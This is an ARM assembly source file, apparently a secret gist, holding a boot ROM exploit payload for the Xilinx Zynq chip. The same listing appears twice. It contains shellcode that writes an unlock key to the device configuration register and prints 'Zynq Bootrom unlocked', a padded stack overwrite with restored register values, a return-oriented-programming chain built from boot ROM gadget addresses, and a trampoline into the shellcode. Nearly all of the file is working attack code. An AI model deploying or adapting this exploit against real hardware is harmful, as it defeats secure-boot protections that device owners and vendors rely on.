four0four/sc.s Secret

## sc.s
.section .text
.global _start
.global _payload
.equ sc_len, 516

.equ mio_init, 0x57a4
.equ uart_init, 0x06a0
.equ printf, 0x0a9c4
.equ bxlr, 0x0000015c
.equ dsb_write, 0xB000
.equ uart_boot_init, 0xA1D4
.equ wfe_loop, 0x007E4
.equ memcpy, 0x1430
.equ putch, 0xA7FC
.equ noise, 0xA1D4

.equ tx_fifo, 0xE0001030
.equ ocm_cfg, 0xF8000910
.equ devcfg, 0xF8007000
.equ devcfg_unlock, 0xF8000008
.equ devcfg_key, 0xdf0ddf0d

# trampoline configurables:
.equ relocation_base, 0x60000
.equ shellcode_sp, 0x68000


# entire payload based at sp+8
_start:
_payload:
        nop
        nop
# "bad block table 0"
.ascii "Bbt0"
_sc_start:
# need this, lazy to fix
nop
nop

movw r0,#0x07c0
movt r0,#0xf800
mov r1, #0xe0

eor r12,r12
movw r12,#mio_init
blx r12

movw r12,#uart_init
blx r12

#wdog
#movw r12,#0x718
#blx r12
#dsb_write(0xf800_0008, 0xdf0ddf0d)
movw r12,#0xB000
movw r0,#8
movt r0,#0xf800
movw r1,#0xdf0d
movt r1,#0xdf0d
blx r12
#wdog
#movw r12,#0x718
#blx r12

#read devcfg
movw r12,#0x1E0C
blx r12
bic r0,r0, #0x800000
orr r0,#0xef
mov r2,r0

movw r12,#0x01E18
blx r12

# grab sctlr:
mov r1, r11
MRC p15, 0, r1 , c1, c0, 0

# grab shadow control reg
movt r11, #0xf800
movw r11, #0x7028
ldr r3, [r11]


# get devconfig:
movw r0, #0x0910
movt r0, #0xf800
movw r12,#0x1E0C
blx r12
mov r2,r0

# get actlr
MRC p15, 0, r1 , c1, c0, 1
# get sctlr
MRC p15, 0, r1 , c1, c0, 0

mov r0, pc
add r0, #banner-.-4
movw r12,#printf
blx r12

#dsb_write(ocm_cfg, 8)
#if we want to edit the IVT, we need to move OCM3 (once relocated!)
#this does mean if we want to debug the bootrom we'd need to remap its RAM
#i think the mmu gives enough granularity?
# .... don't bother right now
# mov r1, #0x8
# movw r0, #0x0910
# movt r0, #0xf800
# movw r12,#0xB000
# blx r12

_loop:
wfe
add pc, #_loop-.-8

_exception:
add r0, pc, #ex_banner-.-8
add r12, pc, #puts-.-8
blx r12
# go back to your loop >:\
add r12, pc, #_loop-.-8
bx r12


puts:
push {r4-r6, lr}
movw r6, #putch
_puts_loop:
ldrb r4, [r0]
cmp r4,#0
popeq {r4-r6, pc}
blx r6
add pc, #_puts_loop-.-8

prompt:
.ascii "> "
banner:
.ascii "Zynq Bootrom unlocked:\n\r"
.ascii "sctlr: 0x%x, devcfg: 0x%x, shadow: 0x%x\n\r\0"
#hd:
#.ascii "%08x\x0a\x0d\0"
ex_banner:
.ascii "exception!\n\r\0"

# pad out stack frame
.rept (sc_len-(.-_payload))
.byte 0
.endr

# restored registers
registers:
.word _r4
.word _r5
.word _r6
.word _r7
.word _r8
.word _r9
.word _r10
.word _r11

.equ _r4, 0x70000
.equ _r5, 0xdead0005
.equ _r6, 0xdead0006
.equ _r7, 0xdead0007
.equ _r8, 0xdead0008
.equ _r9, 0xdead0009
.equ _r10, 0xdead0010
.equ _r11, 0xdead0011

# starting PC (R0 == 0)
# simple ropchain to poke a useful primitive into RAM:
# R0 must be 0
# 0x0000b638: pop {r1, r2, lr}; mul r3, r2, r0; sub r1, r1, r3; bx lr;
.word 0xb638
# r1:
# push {sp}
.word 0xe52dd004
# r2:
.word 0xdeadbeef

# 0x00008a6c: mov r0, #0; str r1, [r4, #0x14]; pop {r4, pc};
.word 0x00008a6c
#r4
.word 0x70004

# R0 must be 0
# 0x0000b638: pop {r1, r2, lr}; mul r3, r2, r0; sub r1, r1, r3; bx lr;
.word 0xb638
# r1:
# pop {pc}
.word 0xe49df004
# r2:
.word 0xdeadbeef

# 0x00008a6c: mov r0, #0; str r1, [r4, #0x14]; pop {r4, pc};
.word 0x00008a6c
#r4
.word 0xdeadbeef

# hit trampoline...
.word 0x70014

# shellcode entrypoint:
trampoline_entry:
add pc,#_sc_start-.-8
#remove that ^ and uncomment
#this v to relocate + enable ivt modification
#add r1,pc,#_sc_start-.
#mov r7,r1
#mov r2,#0x200
#ldr r0,[pc, #reloc_base-.-8]
#mov r12,#memcpy
#blx r12
#ldr r0,[pc, #reloc_base-.-8]
#ldr sp,[pc, #new_sp-.-8]
#bx r0
reloc_base:
.word relocation_base
new_sp:
.word shellcode_sp
	.section .text
	.global _start
	.global _payload
	.equ sc_len, 516

	.equ mio_init, 0x57a4
	.equ uart_init, 0x06a0
	.equ printf, 0x0a9c4
	.equ bxlr, 0x0000015c
	.equ dsb_write, 0xB000
	.equ uart_boot_init, 0xA1D4
	.equ wfe_loop, 0x007E4
	.equ memcpy, 0x1430
	.equ putch, 0xA7FC
	.equ noise, 0xA1D4

	.equ tx_fifo, 0xE0001030
	.equ ocm_cfg, 0xF8000910
	.equ devcfg, 0xF8007000
	.equ devcfg_unlock, 0xF8000008
	.equ devcfg_key, 0xdf0ddf0d

	# trampoline configurables:
	.equ relocation_base, 0x60000
	.equ shellcode_sp, 0x68000



	# entire payload based at sp+8
	_start:
	_payload:
	nop
	nop
	# "bad block table 0"
	.ascii "Bbt0"
	_sc_start:
	# need this, lazy to fix
	nop
	nop

	movw r0,#0x07c0
	movt r0,#0xf800
	mov r1, #0xe0

	eor r12,r12
	movw r12,#mio_init
	blx r12

	movw r12,#uart_init
	blx r12

	#wdog
	#movw r12,#0x718
	#blx r12
	#dsb_write(0xf800_0008, 0xdf0ddf0d)
	movw r12,#0xB000
	movw r0,#8
	movt r0,#0xf800
	movw r1,#0xdf0d
	movt r1,#0xdf0d
	blx r12
	#wdog
	#movw r12,#0x718
	#blx r12

	#read devcfg
	movw r12,#0x1E0C
	blx r12
	bic r0,r0, #0x800000
	orr r0,#0xef
	mov r2,r0

	movw r12,#0x01E18
	blx r12

	# grab sctlr:
	mov r1, r11
	MRC p15, 0, r1 , c1, c0, 0

	# grab shadow control reg
	movt r11, #0xf800
	movw r11, #0x7028
	ldr r3, [r11]


	# get devconfig:
	movw r0, #0x0910
	movt r0, #0xf800
	movw r12,#0x1E0C
	blx r12
	mov r2,r0

	# get actlr
	MRC p15, 0, r1 , c1, c0, 1
	# get sctlr
	MRC p15, 0, r1 , c1, c0, 0

	mov r0, pc
	add r0, #banner-.-4
	movw r12,#printf
	blx r12

	#dsb_write(ocm_cfg, 8)
	#if we want to edit the IVT, we need to move OCM3 (once relocated!)
	#this does mean if we want to debug the bootrom we'd need to remap its RAM
	#i think the mmu gives enough granularity?
	# .... don't bother right now
	# mov r1, #0x8
	# movw r0, #0x0910
	# movt r0, #0xf800
	# movw r12,#0xB000
	# blx r12

	_loop:
	wfe
	add pc, #_loop-.-8

	_exception:
	add r0, pc, #ex_banner-.-8
	add r12, pc, #puts-.-8
	blx r12
	# go back to your loop >:\
	add r12, pc, #_loop-.-8
	bx r12


	puts:
	push {r4-r6, lr}
	movw r6, #putch
	_puts_loop:
	ldrb r4, [r0]
	cmp r4,#0
	popeq {r4-r6, pc}
	blx r6
	add pc, #_puts_loop-.-8

	prompt:
	.ascii "> "
	banner:
	.ascii "Zynq Bootrom unlocked:\n\r"
	.ascii "sctlr: 0x%x, devcfg: 0x%x, shadow: 0x%x\n\r\0"
	#hd:
	#.ascii "%08x\x0a\x0d\0"
	ex_banner:
	.ascii "exception!\n\r\0"

	# pad out stack frame
	.rept (sc_len-(.-_payload))
	.byte 0
	.endr

	# restored registers
	registers:
	.word _r4
	.word _r5
	.word _r6
	.word _r7
	.word _r8
	.word _r9
	.word _r10
	.word _r11

	.equ _r4, 0x70000
	.equ _r5, 0xdead0005
	.equ _r6, 0xdead0006
	.equ _r7, 0xdead0007
	.equ _r8, 0xdead0008
	.equ _r9, 0xdead0009
	.equ _r10, 0xdead0010
	.equ _r11, 0xdead0011

	# starting PC (R0 == 0)
	# simple ropchain to poke a useful primitive into RAM:
	# R0 must be 0
	# 0x0000b638: pop {r1, r2, lr}; mul r3, r2, r0; sub r1, r1, r3; bx lr;
	.word 0xb638
	# r1:
	# push {sp}
	.word 0xe52dd004
	# r2:
	.word 0xdeadbeef

	# 0x00008a6c: mov r0, #0; str r1, [r4, #0x14]; pop {r4, pc};
	.word 0x00008a6c
	#r4
	.word 0x70004

	# R0 must be 0
	# 0x0000b638: pop {r1, r2, lr}; mul r3, r2, r0; sub r1, r1, r3; bx lr;
	.word 0xb638
	# r1:
	# pop {pc}
	.word 0xe49df004
	# r2:
	.word 0xdeadbeef

	# 0x00008a6c: mov r0, #0; str r1, [r4, #0x14]; pop {r4, pc};
	.word 0x00008a6c
	#r4
	.word 0xdeadbeef

	# hit trampoline...
	.word 0x70014

	# shellcode entrypoint:
	trampoline_entry:
	add pc,#_sc_start-.-8
	#remove that ^ and uncomment
	#this v to relocate + enable ivt modification
	#add r1,pc,#_sc_start-.
	#mov r7,r1
	#mov r2,#0x200
	#ldr r0,[pc, #reloc_base-.-8]
	#mov r12,#memcpy
	#blx r12
	#ldr r0,[pc, #reloc_base-.-8]
	#ldr sp,[pc, #new_sp-.-8]
	#bx r0
	reloc_base:
	.word relocation_base
	new_sp:
	.word shellcode_sp